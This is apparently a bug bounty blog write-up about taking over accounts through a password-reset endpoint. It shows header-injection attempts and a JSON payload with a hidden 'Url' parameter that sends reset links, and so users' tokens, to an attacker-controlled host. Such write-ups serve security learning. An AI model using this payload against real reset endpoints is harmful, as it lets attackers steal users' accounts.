One Click To Account Takeover

Hello amazing hunters.

Today , I want to tell a story about my favorite endpoint , Again.

I noticed in the last story , How i able to takeover user’s account with zero click.

Today , I want to try another way to takeover account but this time we need one click from user. 😉

In target.com when we ask reset password , We will receive an email with a reset password link.

  • Target.com/RestPassword/Token/blablablabla

This time , I focus on steal user’s token.

In first try , I inject some header like :

  • “X-Forwarded-Host:”
  • “X-Forwarded-For:”

Unfortunately , Site was not vulnerable to host header injection.

In second try , I noticed a cool thing which lead me to change Host of reset password link but it was not clearly.

I want to tell you a golden tip in this scenario , Should notice to mass assignment vulnerability. If i capture the reset password request , In body request i have a parameter in content-type of json:

  • {“email” : “Evil@attacker.com”}

I said to myself , Is it possible some hidden parameters in request ?

Normally if user send a request with null value , The parameter filled with default value.

Unfortunately , I couldn’t use param miner because the endpoint has rate limit and after each test parameter , I had to check the email. I had to test my word list manually :)

After short time i found a simple parameter that lead me change all the Host and path of reset password link.

When i sent my request with these parameters :

  • {“email” : “Evil@attacker.com” , “Url” : “https://Evill.com/Angel/”}

I got :

Yes, We did it. 😎🥂

To exploit this vulnerability , We have to enter victim email and capture the request after add “Url” parameter with my burp collaborators as value , Then forward the request. One click from user need till account takeover.

After user click on link , We will receive his/her token in burp collaborator then enter the token , ….. 😉

I hope this write-up was helpful for you, Have a good day.

YouTube

Instagram

Twitter

Maybe Hunter But absolutely a movie fan :)